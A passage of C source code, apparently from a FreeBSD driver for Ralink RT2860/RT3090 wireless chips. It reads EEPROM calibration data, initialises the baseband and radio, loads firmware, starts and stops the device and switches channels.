RT3070_RF_3320: return "RT3320"; case RT3070_RF_3053: return "RT3053"; default: return "unknown"; } } static int rt2860_read_eeprom(struct rt2860_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { int8_t delta_2ghz, delta_5ghz; uint32_t tmp; uint16_t val; int ridx, ant, i; /* check whether the ROM is eFUSE ROM or EEPROM */ sc->sc_srom_read = rt2860_eeprom_read_2; if (sc->mac_ver >= 0x3071) { tmp = RAL_READ(sc, RT3070_EFUSE_CTRL); DPRINTF(("EFUSE_CTRL=0x%08x\n", tmp)); if (tmp & RT3070_SEL_EFUSE) sc->sc_srom_read = rt3090_efuse_read_2; } /* read EEPROM version */ val = rt2860_srom_read(sc, RT2860_EEPROM_VERSION); DPRINTF(("EEPROM rev=%d, FAE=%d\n", val & 0xff, val >> 8)); /* read MAC address */ val = rt2860_srom_read(sc, RT2860_EEPROM_MAC01); macaddr[0] = val & 0xff; macaddr[1] = val >> 8; val = rt2860_srom_read(sc, RT2860_EEPROM_MAC23); macaddr[2] = val & 0xff; macaddr[3] = val >> 8; val = rt2860_srom_read(sc, RT2860_EEPROM_MAC45); macaddr[4] = val & 0xff; macaddr[5] = val >> 8; /* read country code */ val = rt2860_srom_read(sc, RT2860_EEPROM_COUNTRY); DPRINTF(("EEPROM region code=0x%04x\n", val)); /* read vendor BBP settings */ for (i = 0; i < 8; i++) { val = rt2860_srom_read(sc, RT2860_EEPROM_BBP_BASE + i); sc->bbp[i].val = val & 0xff; sc->bbp[i].reg = val >> 8; DPRINTF(("BBP%d=0x%02x\n", sc->bbp[i].reg, sc->bbp[i].val)); } if (sc->mac_ver >= 0x3071) { /* read vendor RF settings */ for (i = 0; i < 10; i++) { val = rt2860_srom_read(sc, RT3071_EEPROM_RF_BASE + i); sc->rf[i].val = val & 0xff; sc->rf[i].reg = val >> 8; DPRINTF(("RF%d=0x%02x\n", sc->rf[i].reg, sc->rf[i].val)); } } /* read RF frequency offset from EEPROM */ val = rt2860_srom_read(sc, RT2860_EEPROM_FREQ_LEDS); sc->freq = ((val & 0xff) != 0xff) ? val & 0xff : 0; DPRINTF(("EEPROM freq offset %d\n", sc->freq & 0xff)); if ((val >> 8) != 0xff) { /* read LEDs operating mode */ sc->leds = val >> 8; sc->led[0] = rt2860_srom_read(sc, RT2860_EEPROM_LED1); sc->led[1] = rt2860_srom_read(sc, RT2860_EEPROM_LED2); sc->led[2] = rt2860_srom_read(sc, RT2860_EEPROM_LED3); } else { /* broken EEPROM, use default settings */ sc->leds = 0x01; sc->led[0] = 0x5555; sc->led[1] = 0x2221; sc->led[2] = 0xa9f8; } DPRINTF(("EEPROM LED mode=0x%02x, LEDs=0x%04x/0x%04x/0x%04x\n", sc->leds, sc->led[0], sc->led[1], sc->led[2])); /* read RF information */ val = rt2860_srom_read(sc, RT2860_EEPROM_ANTENNA); if (val == 0xffff) { DPRINTF(("invalid EEPROM antenna info, using default\n")); if (sc->mac_ver == 0x3593) { /* default to RF3053 3T3R */ sc->rf_rev = RT3070_RF_3053; sc->ntxchains = 3; sc->nrxchains = 3; } else if (sc->mac_ver >= 0x3071) { /* default to RF3020 1T1R */ sc->rf_rev = RT3070_RF_3020; sc->ntxchains = 1; sc->nrxchains = 1; } else { /* default to RF2820 1T2R */ sc->rf_rev = RT2860_RF_2820; sc->ntxchains = 1; sc->nrxchains = 2; } } else { sc->rf_rev = (val >> 8) & 0xf; sc->ntxchains = (val >> 4) & 0xf; sc->nrxchains = val & 0xf; } DPRINTF(("EEPROM RF rev=0x%02x chains=%dT%dR\n", sc->rf_rev, sc->ntxchains, sc->nrxchains)); /* check if RF supports automatic Tx access gain control */ val = rt2860_srom_read(sc, RT2860_EEPROM_CONFIG); DPRINTF(("EEPROM CFG 0x%04x\n", val)); /* check if driver should patch the DAC issue */ if ((val >> 8) != 0xff) sc->patch_dac = (val >> 15) & 1; if ((val & 0xff) != 0xff) { sc->ext_5ghz_lna = (val >> 3) & 1; sc->ext_2ghz_lna = (val >> 2) & 1; /* check if RF supports automatic Tx access gain control */ sc->calib_2ghz = sc->calib_5ghz = 0; /* XXX (val >> 1) & 1 */; /* check if we have a hardware radio switch */ sc->rfswitch = val & 1; } if (sc->sc_flags & RT2860_ADVANCED_PS) { /* read PCIe power save level */ val = rt2860_srom_read(sc, RT2860_EEPROM_PCIE_PSLEVEL); if ((val & 0xff) != 0xff) { sc->pslevel = val & 0x3; val = rt2860_srom_read(sc, RT2860_EEPROM_REV); if ((val & 0xff80) != 0x9280) sc->pslevel = MIN(sc->pslevel, 1); DPRINTF(("EEPROM PCIe PS Level=%d\n", sc->pslevel)); } } /* read power settings for 2GHz channels */ for (i = 0; i < 14; i += 2) { val = rt2860_srom_read(sc, RT2860_EEPROM_PWR2GHZ_BASE1 + i / 2); sc->txpow1[i + 0] = (int8_t)(val & 0xff); sc->txpow1[i + 1] = (int8_t)(val >> 8); val = rt2860_srom_read(sc, RT2860_EEPROM_PWR2GHZ_BASE2 + i / 2); sc->txpow2[i + 0] = (int8_t)(val & 0xff); sc->txpow2[i + 1] = (int8_t)(val >> 8); } /* fix broken Tx power entries */ for (i = 0; i < 14; i++) { if (sc->txpow1[i] < 0 || sc->txpow1[i] > 31) sc->txpow1[i] = 5; if (sc->txpow2[i] < 0 || sc->txpow2[i] > 31) sc->txpow2[i] = 5; DPRINTF(("chan %d: power1=%d, power2=%d\n", rt2860_rf2850[i].chan, sc->txpow1[i], sc->txpow2[i])); } /* read power settings for 5GHz channels */ for (i = 0; i < 40; i += 2) { val = rt2860_srom_read(sc, RT2860_EEPROM_PWR5GHZ_BASE1 + i / 2); sc->txpow1[i + 14] = (int8_t)(val & 0xff); sc->txpow1[i + 15] = (int8_t)(val >> 8); val = rt2860_srom_read(sc, RT2860_EEPROM_PWR5GHZ_BASE2 + i / 2); sc->txpow2[i + 14] = (int8_t)(val & 0xff); sc->txpow2[i + 15] = (int8_t)(val >> 8); } /* fix broken Tx power entries */ for (i = 0; i < 40; i++) { if (sc->txpow1[14 + i] < -7 || sc->txpow1[14 + i] > 15) sc->txpow1[14 + i] = 5; if (sc->txpow2[14 + i] < -7 || sc->txpow2[14 + i] > 15) sc->txpow2[14 + i] = 5; DPRINTF(("chan %d: power1=%d, power2=%d\n", rt2860_rf2850[14 + i].chan, sc->txpow1[14 + i], sc->txpow2[14 + i])); } /* read Tx power compensation for each Tx rate */ val = rt2860_srom_read(sc, RT2860_EEPROM_DELTAPWR); delta_2ghz = delta_5ghz = 0; if ((val & 0xff) != 0xff && (val & 0x80)) { delta_2ghz = val & 0xf; if (!(val & 0x40)) /* negative number */ delta_2ghz = -delta_2ghz; } val >>= 8; if ((val & 0xff) != 0xff && (val & 0x80)) { delta_5ghz = val & 0xf; if (!(val & 0x40)) /* negative number */ delta_5ghz = -delta_5ghz; } DPRINTF(("power compensation=%d (2GHz), %d (5GHz)\n", delta_2ghz, delta_5ghz)); for (ridx = 0; ridx < 5; ridx++) { uint32_t reg; val = rt2860_srom_read(sc, RT2860_EEPROM_RPWR + ridx * 2); reg = val; val = rt2860_srom_read(sc, RT2860_EEPROM_RPWR + ridx * 2 + 1); reg |= (uint32_t)val << 16; sc->txpow20mhz[ridx] = reg; sc->txpow40mhz_2ghz[ridx] = b4inc(reg, delta_2ghz); sc->txpow40mhz_5ghz[ridx] = b4inc(reg, delta_5ghz); DPRINTF(("ridx %d: power 20MHz=0x%08x, 40MHz/2GHz=0x%08x, " "40MHz/5GHz=0x%08x\n", ridx, sc->txpow20mhz[ridx], sc->txpow40mhz_2ghz[ridx], sc->txpow40mhz_5ghz[ridx])); } /* read factory-calibrated samples for temperature compensation */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI1_2GHZ); sc->tssi_2ghz[0] = val & 0xff; /* [-4] */ sc->tssi_2ghz[1] = val >> 8; /* [-3] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI2_2GHZ); sc->tssi_2ghz[2] = val & 0xff; /* [-2] */ sc->tssi_2ghz[3] = val >> 8; /* [-1] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI3_2GHZ); sc->tssi_2ghz[4] = val & 0xff; /* [+0] */ sc->tssi_2ghz[5] = val >> 8; /* [+1] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI4_2GHZ); sc->tssi_2ghz[6] = val & 0xff; /* [+2] */ sc->tssi_2ghz[7] = val >> 8; /* [+3] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI5_2GHZ); sc->tssi_2ghz[8] = val & 0xff; /* [+4] */ sc->step_2ghz = val >> 8; DPRINTF(("TSSI 2GHz: 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x " "0x%02x 0x%02x step=%d\n", sc->tssi_2ghz[0], sc->tssi_2ghz[1], sc->tssi_2ghz[2], sc->tssi_2ghz[3], sc->tssi_2ghz[4], sc->tssi_2ghz[5], sc->tssi_2ghz[6], sc->tssi_2ghz[7], sc->tssi_2ghz[8], sc->step_2ghz)); /* check that ref value is correct, otherwise disable calibration */ if (sc->tssi_2ghz[4] == 0xff) sc->calib_2ghz = 0; val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI1_5GHZ); sc->tssi_5ghz[0] = val & 0xff; /* [-4] */ sc->tssi_5ghz[1] = val >> 8; /* [-3] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI2_5GHZ); sc->tssi_5ghz[2] = val & 0xff; /* [-2] */ sc->tssi_5ghz[3] = val >> 8; /* [-1] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI3_5GHZ); sc->tssi_5ghz[4] = val & 0xff; /* [+0] */ sc->tssi_5ghz[5] = val >> 8; /* [+1] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI4_5GHZ); sc->tssi_5ghz[6] = val & 0xff; /* [+2] */ sc->tssi_5ghz[7] = val >> 8; /* [+3] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI5_5GHZ); sc->tssi_5ghz[8] = val & 0xff; /* [+4] */ sc->step_5ghz = val >> 8; DPRINTF(("TSSI 5GHz: 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x " "0x%02x 0x%02x step=%d\n", sc->tssi_5ghz[0], sc->tssi_5ghz[1], sc->tssi_5ghz[2], sc->tssi_5ghz[3], sc->tssi_5ghz[4], sc->tssi_5ghz[5], sc->tssi_5ghz[6], sc->tssi_5ghz[7], sc->tssi_5ghz[8], sc->step_5ghz)); /* check that ref value is correct, otherwise disable calibration */ if (sc->tssi_5ghz[4] == 0xff) sc->calib_5ghz = 0; /* read RSSI offsets and LNA gains from EEPROM */ val = rt2860_srom_read(sc, RT2860_EEPROM_RSSI1_2GHZ); sc->rssi_2ghz[0] = val & 0xff; /* Ant A */ sc->rssi_2ghz[1] = val >> 8; /* Ant B */ val = rt2860_srom_read(sc, RT2860_EEPROM_RSSI2_2GHZ); if (sc->mac_ver >= 0x3071) { /* * On RT3090 chips (limited to 2 Rx chains), this ROM * field contains the Tx mixer gain for the 2GHz band. */ if ((val & 0xff) != 0xff) sc->txmixgain_2ghz = val & 0x7; DPRINTF(("tx mixer gain=%u (2GHz)\n", sc->txmixgain_2ghz)); } else sc->rssi_2ghz[2] = val & 0xff; /* Ant C */ sc->lna[2] = val >> 8; /* channel group 2 */ val = rt2860_srom_read(sc, RT2860_EEPROM_RSSI1_5GHZ); sc->rssi_5ghz[0] = val & 0xff; /* Ant A */ sc->rssi_5ghz[1] = val >> 8; /* Ant B */ val = rt2860_srom_read(sc, RT2860_EEPROM_RSSI2_5GHZ); sc->rssi_5ghz[2] = val & 0xff; /* Ant C */ sc->lna[3] = val >> 8; /* channel group 3 */ val = rt2860_srom_read(sc, RT2860_EEPROM_LNA); if (sc->mac_ver >= 0x3071) sc->lna[0] = RT3090_DEF_LNA; else /* channel group 0 */ sc->lna[0] = val & 0xff; sc->lna[1] = val >> 8; /* channel group 1 */ /* fix broken 5GHz LNA entries */ if (sc->lna[2] == 0 || sc->lna[2] == 0xff) { DPRINTF(("invalid LNA for channel group %d\n", 2)); sc->lna[2] = sc->lna[1]; } if (sc->lna[3] == 0 || sc->lna[3] == 0xff) { DPRINTF(("invalid LNA for channel group %d\n", 3)); sc->lna[3] = sc->lna[1]; } /* fix broken RSSI offset entries */ for (ant = 0; ant < 3; ant++) { if (sc->rssi_2ghz[ant] < -10 || sc->rssi_2ghz[ant] > 10) { DPRINTF(("invalid RSSI%d offset: %d (2GHz)\n", ant + 1, sc->rssi_2ghz[ant])); sc->rssi_2ghz[ant] = 0; } if (sc->rssi_5ghz[ant] < -10 || sc->rssi_5ghz[ant] > 10) { DPRINTF(("invalid RSSI%d offset: %d (5GHz)\n", ant + 1, sc->rssi_5ghz[ant])); sc->rssi_5ghz[ant] = 0; } } return 0; } int rt2860_bbp_init(struct rt2860_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) int i, ntries; /* wait for BBP to wake up */ for (ntries = 0; ntries < 20; ntries++) { uint8_t bbp0 = rt2860_mcu_bbp_read(sc, 0); if (bbp0 != 0 && bbp0 != 0xff) break; } if (ntries == 20) { device_printf(sc->sc_dev, "timeout waiting for BBP to wake up\n"); return ETIMEDOUT; } /* initialize BBP registers to default values */ for (i = 0; i < N(rt2860_def_bbp); i++) { rt2860_mcu_bbp_write(sc, rt2860_def_bbp[i].reg, rt2860_def_bbp[i].val); } /* fix BBP84 for RT2860E */ if (sc->mac_ver == 0x2860 && sc->mac_rev != 0x0101) rt2860_mcu_bbp_write(sc, 84, 0x19); if (sc->mac_ver >= 0x3071) { rt2860_mcu_bbp_write(sc, 79, 0x13); rt2860_mcu_bbp_write(sc, 80, 0x05); rt2860_mcu_bbp_write(sc, 81, 0x33); } else if (sc->mac_ver == 0x2860 && sc->mac_rev == 0x0100) { rt2860_mcu_bbp_write(sc, 69, 0x16); rt2860_mcu_bbp_write(sc, 73, 0x12); } return 0; #undef N } static int rt2860_txrx_enable(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; int ntries; /* enable Tx/Rx DMA engine */ RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_TX_EN); RAL_BARRIER_READ_WRITE(sc); for (ntries = 0; ntries < 200; ntries++) { tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; DELAY(1000); } if (ntries == 200) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); return ETIMEDOUT; } DELAY(50); tmp |= RT2860_RX_DMA_EN | RT2860_TX_DMA_EN | RT2860_WPDMA_BT_SIZE64 << RT2860_WPDMA_BT_SIZE_SHIFT; RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); /* set Rx filter */ tmp = RT2860_DROP_CRC_ERR | RT2860_DROP_PHY_ERR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2860_DROP_UC_NOME | RT2860_DROP_DUPL | RT2860_DROP_CTS | RT2860_DROP_BA | RT2860_DROP_ACK | RT2860_DROP_VER_ERR | RT2860_DROP_CTRL_RSV | RT2860_DROP_CFACK | RT2860_DROP_CFEND; if (ic->ic_opmode == IEEE80211_M_STA) tmp |= RT2860_DROP_RTS | RT2860_DROP_PSPOLL; } RAL_WRITE(sc, RT2860_RX_FILTR_CFG, tmp); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); return 0; } static void rt2860_init(void *arg) { struct rt2860_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); rt2860_init_locked(sc); RAL_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); } static void rt2860_init_locked(struct rt2860_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; uint8_t bbp1, bbp3; int i, qid, ridx, ntries, error; RAL_LOCK_ASSERT(sc); if (sc->rfswitch) { /* hardware has a radio switch on GPIO pin 2 */ if (!(RAL_READ(sc, RT2860_GPIO_CTRL) & (1 << 2))) { device_printf(sc->sc_dev, "radio is disabled by hardware switch\n"); #ifdef notyet rt2860_stop_locked(sc); return; #endif } } RAL_WRITE(sc, RT2860_PWR_PIN_CFG, RT2860_IO_RA_PE); /* disable DMA */ tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); tmp &= 0xff0; RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); /* PBF hardware reset */ RAL_WRITE(sc, RT2860_SYS_CTRL, 0xe1f); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_SYS_CTRL, 0xe00); if ((error = rt2860_load_microcode(sc)) != 0) { device_printf(sc->sc_dev, "could not load 8051 microcode\n"); rt2860_stop_locked(sc); return; } rt2860_set_macaddr(sc, IF_LLADDR(ifp)); /* init Tx power for all Tx rates (from EEPROM) */ for (ridx = 0; ridx < 5; ridx++) { if (sc->txpow20mhz[ridx] == 0xffffffff) continue; RAL_WRITE(sc, RT2860_TX_PWR_CFG(ridx), sc->txpow20mhz[ridx]); } for (ntries = 0; ntries < 100; ntries++) { tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); rt2860_stop_locked(sc); return; } tmp &= 0xff0; RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); /* reset Rx ring and all 6 Tx rings */ RAL_WRITE(sc, RT2860_WPDMA_RST_IDX, 0x1003f); /* PBF hardware reset */ RAL_WRITE(sc, RT2860_SYS_CTRL, 0xe1f); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_SYS_CTRL, 0xe00); RAL_WRITE(sc, RT2860_PWR_PIN_CFG, RT2860_IO_RA_PE | RT2860_IO_RF_PE); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_BBP_HRST | RT2860_MAC_SRST); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, 0); for (i = 0; i < N(rt2860_def_mac); i++) RAL_WRITE(sc, rt2860_def_mac[i].reg, rt2860_def_mac[i].val); if (sc->mac_ver >= 0x3071) { /* set delay of PA_PE assertion to 1us (unit of 0.25us) */ RAL_WRITE(sc, RT2860_TX_SW_CFG0, 4 << RT2860_DLY_PAPE_EN_SHIFT); } if (!(RAL_READ(sc, RT2860_PCI_CFG) & RT2860_PCI_CFG_PCI)) { sc->sc_flags |= RT2860_PCIE; /* PCIe has different clock cycle count than PCI */ tmp = RAL_READ(sc, RT2860_US_CYC_CNT); tmp = (tmp & ~0xff) | 0x7d; RAL_WRITE(sc, RT2860_US_CYC_CNT, tmp); } /* wait while MAC is busy */ for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_MAC_STATUS_REG) & (RT2860_RX_STATUS_BUSY | RT2860_TX_STATUS_BUSY))) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for MAC\n"); rt2860_stop_locked(sc); return; } /* clear Host to MCU mailbox */ RAL_WRITE(sc, RT2860_H2M_BBPAGENT, 0); RAL_WRITE(sc, RT2860_H2M_MAILBOX, 0); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_RFRESET, 0, 0); DELAY(1000); if ((error = rt2860_bbp_init(sc)) != 0) { rt2860_stop_locked(sc); return; } /* clear RX WCID search table */ RAL_SET_REGION_4(sc, RT2860_WCID_ENTRY(0), 0, 512); /* clear pairwise key table */ RAL_SET_REGION_4(sc, RT2860_PKEY(0), 0, 2048); /* clear IV/EIV table */ RAL_SET_REGION_4(sc, RT2860_IVEIV(0), 0, 512); /* clear WCID attribute table */ RAL_SET_REGION_4(sc, RT2860_WCID_ATTR(0), 0, 256); /* clear shared key table */ RAL_SET_REGION_4(sc, RT2860_SKEY(0, 0), 0, 8 * 32); /* clear shared key mode */ RAL_SET_REGION_4(sc, RT2860_SKEY_MODE_0_7, 0, 4); /* init Tx rings (4 EDCAs + HCCA + Mgt) */ for (qid = 0; qid < 6; qid++) { RAL_WRITE(sc, RT2860_TX_BASE_PTR(qid), sc->txq[qid].paddr); RAL_WRITE(sc, RT2860_TX_MAX_CNT(qid), RT2860_TX_RING_COUNT); RAL_WRITE(sc, RT2860_TX_CTX_IDX(qid), 0); } /* init Rx ring */ RAL_WRITE(sc, RT2860_RX_BASE_PTR, sc->rxq.paddr); RAL_WRITE(sc, RT2860_RX_MAX_CNT, RT2860_RX_RING_COUNT); RAL_WRITE(sc, RT2860_RX_CALC_IDX, RT2860_RX_RING_COUNT - 1); /* setup maximum buffer sizes */ RAL_WRITE(sc, RT2860_MAX_LEN_CFG, 1 << 12 | (MCLBYTES - sizeof (struct rt2860_rxwi) - 2)); for (ntries = 0; ntries < 100; ntries++) { tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); rt2860_stop_locked(sc); return; } tmp &= 0xff0; RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); /* disable interrupts mitigation */ RAL_WRITE(sc, RT2860_DELAY_INT_CFG, 0); /* write vendor-specific BBP values (from EEPROM) */ for (i = 0; i < 8; i++) { if (sc->bbp[i].reg == 0 || sc->bbp[i].reg == 0xff) continue; rt2860_mcu_bbp_write(sc, sc->bbp[i].reg, sc->bbp[i].val); } /* select Main antenna for 1T1R devices */ if (sc->rf_rev == RT3070_RF_2020 || sc->rf_rev == RT3070_RF_3020 || sc->rf_rev == RT3070_RF_3320) rt3090_set_rx_antenna(sc, 0); /* send LEDs operating mode to microcontroller */ rt2860_mcu_cmd(sc, RT2860_MCU_CMD_LED1, sc->led[0], 0); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_LED2, sc->led[1], 0); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_LED3, sc->led[2], 0); if (sc->mac_ver >= 0x3071) rt3090_rf_init(sc); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_SLEEP, 0x02ff, 1); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_WAKEUP, 0, 1); if (sc->mac_ver >= 0x3071) rt3090_rf_wakeup(sc); /* disable non-existing Rx chains */ bbp3 = rt2860_mcu_bbp_read(sc, 3); bbp3 &= ~(1 << 3 | 1 << 4); if (sc->nrxchains == 2) bbp3 |= 1 << 3; else if (sc->nrxchains == 3) bbp3 |= 1 << 4; rt2860_mcu_bbp_write(sc, 3, bbp3); /* disable non-existing Tx chains */ bbp1 = rt2860_mcu_bbp_read(sc, 1); if (sc->ntxchains == 1) bbp1 = (bbp1 & ~(1 << 3 | 1 << 4)); else if (sc->mac_ver == 0x3593 && sc->ntxchains == 2) bbp1 = (bbp1 & ~(1 << 4)) | 1 << 3; else if (sc->mac_ver == 0x3593 && sc->ntxchains == 3) bbp1 = (bbp1 & ~(1 << 3)) | 1 << 4; rt2860_mcu_bbp_write(sc, 1, bbp1); if (sc->mac_ver >= 0x3071) rt3090_rf_setup(sc); /* select default channel */ rt2860_switch_chan(sc, ic->ic_curchan); /* reset RF from MCU */ rt2860_mcu_cmd(sc, RT2860_MCU_CMD_RFRESET, 0, 0); /* set RTS threshold */ tmp = RAL_READ(sc, RT2860_TX_RTS_CFG); tmp &= ~0xffff00; tmp |= IEEE80211_RTS_DEFAULT << 8; RAL_WRITE(sc, RT2860_TX_RTS_CFG, tmp); /* setup initial protection mode */ rt2860_updateprot(ifp); /* turn radio LED on */ rt2860_set_leds(sc, RT2860_LED_RADIO); /* enable Tx/Rx DMA engine */ if ((error = rt2860_txrx_enable(sc)) != 0) { rt2860_stop_locked(sc); return; } /* clear pending interrupts */ RAL_WRITE(sc, RT2860_INT_STATUS, 0xffffffff); /* enable interrupts */ RAL_WRITE(sc, RT2860_INT_MASK, 0x3fffc); if (sc->sc_flags & RT2860_ADVANCED_PS) rt2860_mcu_cmd(sc, RT2860_MCU_CMD_PSLEVEL, sc->pslevel, 0); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->watchdog_ch, hz, rt2860_watchdog, sc); #undef N } static void rt2860_stop(void *arg) { struct rt2860_softc *sc = arg; RAL_LOCK(sc); rt2860_stop_locked(sc); RAL_UNLOCK(sc); } static void rt2860_stop_locked(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; int qid; if (ifp->if_drv_flags & IFF_DRV_RUNNING) rt2860_set_leds(sc, 0); /* turn all LEDs off */ callout_stop(&sc->watchdog_ch); sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* disable interrupts */ RAL_WRITE(sc, RT2860_INT_MASK, 0); /* disable GP timer */ rt2860_set_gp_timer(sc, 0); /* disable Rx */ tmp = RAL_READ(sc, RT2860_MAC_SYS_CTRL); tmp &= ~(RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, tmp); /* reset adapter */ RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_BBP_HRST | RT2860_MAC_SRST); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, 0); /* reset Tx and Rx rings (and reclaim TXWIs) */ sc->qfullmsk = 0; for (qid = 0; qid < 6; qid++) rt2860_reset_tx_ring(sc, &sc->txq[qid]); rt2860_reset_rx_ring(sc, &sc->rxq); } int rt2860_load_microcode(struct rt2860_softc *sc) { const struct firmware *fp; int ntries, error; RAL_LOCK_ASSERT(sc); RAL_UNLOCK(sc); fp = firmware_get("rt2860fw"); RAL_LOCK(sc); if (fp == NULL) { device_printf(sc->sc_dev, "unable to receive rt2860fw firmware image\n"); return EINVAL; } /* set "host program ram write selection" bit */ RAL_WRITE(sc, RT2860_SYS_CTRL, RT2860_HST_PM_SEL); /* write microcode image */ RAL_WRITE_REGION_1(sc, RT2860_FW_BASE, fp->data, fp->datasize); /* kick microcontroller unit */ RAL_WRITE(sc, RT2860_SYS_CTRL, 0); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_SYS_CTRL, RT2860_MCU_RESET); RAL_WRITE(sc, RT2860_H2M_BBPAGENT, 0); RAL_WRITE(sc, RT2860_H2M_MAILBOX, 0); /* wait until microcontroller is ready */ RAL_BARRIER_READ_WRITE(sc); for (ntries = 0; ntries < 1000; ntries++) { if (RAL_READ(sc, RT2860_SYS_CTRL) & RT2860_MCU_READY) break; DELAY(1000); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for MCU to initialize\n"); error = ETIMEDOUT; } else error = 0; firmware_put(fp, FIRMWARE_UNLOAD); return error; } /* * This function is called periodically to adjust Tx power based on * temperature variation. */ #ifdef NOT_YET static void rt2860_calib(struct rt2860_softc *sc) { struct ieee80211com *ic = &sc->sc_ic; const uint8_t *tssi; uint8_t step, bbp49; int8_t ridx, d; /* read current temperature */ bbp49 = rt2860_mcu_bbp_read(sc, 49); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_bss->ni_chan)) { tssi = &sc->tssi_2ghz[4]; step = sc->step_2ghz; } else { tssi = &sc->tssi_5ghz[4]; step = sc->step_5ghz; } if (bbp49 < tssi[0]) { /* lower than reference */ /* use higher Tx power than default */ for (d = 0; d > -4 && bbp49 <= tssi[d - 1]; d--); } else if (bbp49 > tssi[0]) { /* greater than reference */ /* use lower Tx power than default */ for (d = 0; d < +4 && bbp49 >= tssi[d + 1]; d++); } else { /* use default Tx power */ d = 0; } d *= step; DPRINTF(("BBP49=0x%02x, adjusting Tx power by %d\n", bbp49, d)); /* write adjusted Tx power values for each Tx rate */ for (ridx = 0; ridx < 5; ridx++) { if (sc->txpow20mhz[ridx] == 0xffffffff) continue; RAL_WRITE(sc, RT2860_TX_PWR_CFG(ridx), b4inc(sc->txpow20mhz[ridx], d)); } } #endif static void rt3090_set_rx_antenna(struct rt2860_softc *sc, int aux) { uint32_t tmp; if (aux) { tmp = RAL_READ(sc, RT2860_PCI_EECTRL); RAL_WRITE(sc, RT2860_PCI_EECTRL, tmp & ~RT2860_C); tmp = RAL_READ(sc, RT2860_GPIO_CTRL); RAL_WRITE(sc, RT2860_GPIO_CTRL, (tmp & ~0x0808) | 0x08); } else { tmp = RAL_READ(sc, RT2860_PCI_EECTRL); RAL_WRITE(sc, RT2860_PCI_EECTRL, tmp | RT2860_C); tmp = RAL_READ(sc, RT2860_GPIO_CTRL); RAL_WRITE(sc, RT2860_GPIO_CTRL, tmp & ~0x0808); } } static void rt2860_switch_chan(struct rt2860_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; u_int chan, group; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) return; if (sc->mac_ver >= 0x3071) rt3090_set_chan(sc, chan); else rt2860_set_chan(sc, chan); /* determine channel group */ if (chan <= 14) group = 0; else if (chan <= 64) group = 1; else if (chan <= 128) group = 2; else group = 3; /* XXX necessary only when group has changed! */ rt2860_select_chan_group(sc, group); DELAY(1000); } static int 